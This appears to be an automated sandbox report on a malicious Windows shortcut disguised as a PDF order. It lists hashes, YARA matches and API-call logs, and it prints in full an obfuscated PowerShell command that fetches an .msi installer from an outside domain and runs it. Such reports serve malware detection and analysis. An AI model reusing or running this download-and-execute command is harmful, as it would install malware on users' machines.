Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 9, 2025, 9:58 a.m.	April 9, 2025, 10 a.m.

Size	5.2KB
Type	MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, Normal, ctime=Mon Feb 17 07:59:01 2025, mtime=Mon Mar 3 07:59:01 2025, atime=Mon Feb 17 07:59:01 2025, length=0, window=hidenormalshowminimized
MD5	`8b68173e0f5484fc965d50770f71a08d`
SHA256	`d438e9a6ae13b67cee568aca33fd863bf1b861601c8eee71264e6c0f7e96c043`
CRC32	`91D9C017`
ssdeep	`96:83W9u+h/z+lnJq+zH/92yKxeHeByQw2lQoWQrpe6xLdrg:83W9uEy9/fhMeH+hwp+9e6xLx`
Yara	Antivirus - Contains references to security software lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "aFdBGhgfNGUpbdqt" C:\Users\test22\AppData\Local\Temp\Microsoft-Order.pdf.lnk
1648
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (' '+'(Vuq2qBsoVuq+VuqmeDatVuq+Vuqa =Vuq+Vuq @(Vuq+Vuq Vuq+Vuq Vuq+Vuq[Vuq+VuqPSCV'+'uq+VuqustomObjeVuq+Vuqct'+'Vuq'+'+Vuq]@{a = Vuq+Vuqb'+'m6Vuq+VuqhtVuq+VuqtpVuq+Vuqs://goVuq+Vuq-cVuq+VuqaVuq+VuqrVuq+Vuqs-chVuq+VuqeapVuq+VuqrestVuq+Vuq.cfd/UVuq+VuqXVR'+'UZ'+'MQ.msibm6Vuq'+'+Vuq; b = bm6filVuq+VuqeVuq+Vuq8dd75fVuq+Vuq5Vuq+Vuq7e41a2f8.msibmVuq+Vuq6Vuq+Vuq}'+' ); foreachVuq+Vuq (2qVuq+VuqBi in 2qBsomeData) { Vuq+VuqtryVuq+Vuq {Vuq+Vuq Vu'+'q+Vuq 2qBfilePaVuq+VuqtVuq+Vuqh Vuq+Vuq= Vuq+Vuq'+'bm62qBenv:TEMPdH52qBVuq+Vuq(Vuq+Vuq2qBi.b)bm6; Vuq+Vuq 2qB'+'doVuq+Vuqwnload = 2Vuq+VuqqBVuq+VuqtrVuq+Vuque; Vuq+Vuq'+' iVuq+VuqfVuq+Vuq Vuq+Vuq(TVuq+Vuqest-Vuq+VuqPath Vuq+Vuq2Vuq+VuqqBfileVuq+VuqPathVuq+Vuq) Vuq+Vuq{Vuq+Vuq Vuq+Vuq 2qVuq+VuqBVuq+VuqdowVuq+VuqnloVuq+Vuqad =Vuq+Vuq 2qBfalseVuq+Vuq; Vuq+Vuq } if (2qBVuq+'+'Vuqdownload) { Vuq+Vuq'+' Vuq+Vuq Vuq+Vuq '+'Invoke-Vuq+VuqRestMethodVuq'+'+Vuq -Vuq+VuqUriVuq+Vuq Vuq+Vuq2qBi.Vuq+Vu'+'qa -OutFile 2qBfilVuq+V'+'uqePath; Vuq+Vuq } Vuq'+'+Vuq Vuq+VuqSVuq+Vuqtart-Proc'+'Vuq+Vuqess 2qBfilePath; Vuq+Vuq } cVu'+'q+VuqaVuq+VuqtVuq+VuqcVuq+Vuqh { Vuq+Vuq } Vuq+Vuq } Vuq).REPlaCE(VuqdH5Vu'+'q,[STrInG][cHAr]92).REPlaCE(([cHAr]50+[cHAr]113+[cHAr]66),Vuq0aXVuq).REPl'+'aCE(Vuqbm6Vuq,[STrInG][cHAr]34)'+'Vnq iEX').rEplACE('Vuq',[strInG][ChAR]39).rEplACE(([ChAR]48+[ChAR]97+[ChAR]88),[strInG][ChAR]36).rEplACE(([ChAR]86+[ChAR]110+[ChAR]113),'|')| &( $ENv:COmSpeC[4,15,25]-joIn'')
  2148

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 9, 2025, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 9, 2025, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 9, 2025, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 9, 2025, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 9, 2025, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 9, 2025, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 9, 2025, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 9, 2025, 9:58 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 9, 2025, 9:58 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067cd70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d3f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d3f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d3f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d3f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d3f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d3f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ccf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067d0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ceb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ceb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ceb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ceb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ceb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ceb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ceb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ceb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ceb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ceb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ceb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ceb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ceb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ceb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ccb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ccb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ccb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 9, 2025, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ccb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 9, 2025, 9:58 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 136 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02280000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0243a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02432000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02442000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0246a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02443000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02444000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0247b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02477000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0243b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02462000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02475000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02445000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0246c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02730000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02446000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0247c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02463000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02464000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02465000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02466000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02467000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02468000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02469000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e03000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e04000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e05000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e06000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e07000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e08000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e09000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e0a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e0b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e0c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e0d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e0e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e0f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 9, 2025, 9:58 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\Microsoft-Order.pdf.lnk

Creates a suspicious process (1 event)

cmdline

